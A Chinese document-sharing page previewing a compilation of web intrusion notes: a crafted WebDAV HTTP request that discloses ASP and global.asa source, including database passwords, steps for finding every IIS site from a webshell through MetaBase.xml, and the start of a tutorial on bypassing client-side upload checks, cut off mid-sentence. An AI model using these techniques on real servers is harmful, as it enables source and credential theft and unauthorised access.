WEB相关内容整合.docxVIP

  • 0
  • 0
  • 约5.78千字
  • 约 5页
  • 2026-01-28 发布于山西
  • 举报

WEB相关内容整合

webdav的利用方法

当IIS在webdav功能开启的状态下。如果web使用了Global.asa这个文件结构,可以通过特殊HTTP请求,看到其源代码。造成数据库IP和口令泄露。

XML/HTML代码

GET/global.asa\HTTP/1.0

Accept:*/*

Accept-Language:en-US

User-Agent:Mozilla/4.0(compatible;MSIE6.0;Win32)

Host:

Referer:/

Translate:f

Content-Type:application/x-www-form-urlencoded

在webdav和脚本资源访问都打开的情况下,通过上边的请求,可以看到ASP等文件的源代码。而webdav都是默认打开的,所以当打开脚本资源访问选项时就会激活此问题

webshell下查找所有IIS站点配置

webshell下查找所有IIS站点配置

默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,

路径是C:\WINDOWS\system32\inetsrv\(一般这个目录设置的everyone读的权限.)

MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。

几个主要的配置有:

ServerComment:我的网站//站点的名称

ServerBindings:80//站点的端口

Path=D:\wwwroot//这里是站点的路径

DefaultDoc=index.asp,index.php,index.htm,Default.htm,Default.asp,Default.aspx//默认文档头,就是主页显示文件名

ScriptMaps==.asa,C:\WINDOWS\syst...........//站点支持的哪些脚本.

还有就是看C:\WINDOWS\system32\inetsrv\History这个目录,这个目录里是对每次站点的IIS设置进行的备份.

但这些都涉及到权限问题,如果权限默认设置严格就访问不了了。

Web入侵安全检测之表单提交

在Web程序设计中,处理表单提交的数据是客户端向SERVER传递数据的主要方法,表单数据的提交方法有两种Post方法和Get方法,当使用Post方法时,数据由标准的

输入设备读入,当使用Get方法时,数据由CGI变量QUERY_STRING传递给表单数据处理程序,当Post方法一般不会在服务器上留下痕迹。具体的实现过程这里我就不多说,

有兴趣的朋友可以去翻阅其他资料。不管是ASP程序还是PHP,CGI程序,表单提交的作用的大同小异的,所以这里仅以ASP为例。

一.利用表单本地提交突破入侵限制

既然表单是客户端与服务端的重要数据传递方法之一,那么它的安全性就难免会出现问题。

1:上传非法文件。

某同学录的popwindowupload1.asp的客户端代码如下:

HTML....Scriptlanguage=javascriptfunctionmysubmit(theform){if(theform.big.value==){alert(请点击浏览按钮,选择您要上传的jpg或gif文件!)theform.big.focus;return(false);}else{str=theform.big.value;strs=str.toLowerCase();lens=strs.length;extname=strs.substring(lens-4,lens);if(extname!=.jpgextname!=.gif){alert(请选择jpg或gif文件!);return(false);}}return(true);}/script.....inputtype=hiddenname=actvalue=uploadinputtype=hiddenname=filepathvalue=/alumni/class/classimageinputtype=submitname=Submit2value=开始上传..../HTML

很明显,这个上传文件在客户端利用SCRIPT限制了上传类

文档评论(0)

1亿VIP精品文档

相关文档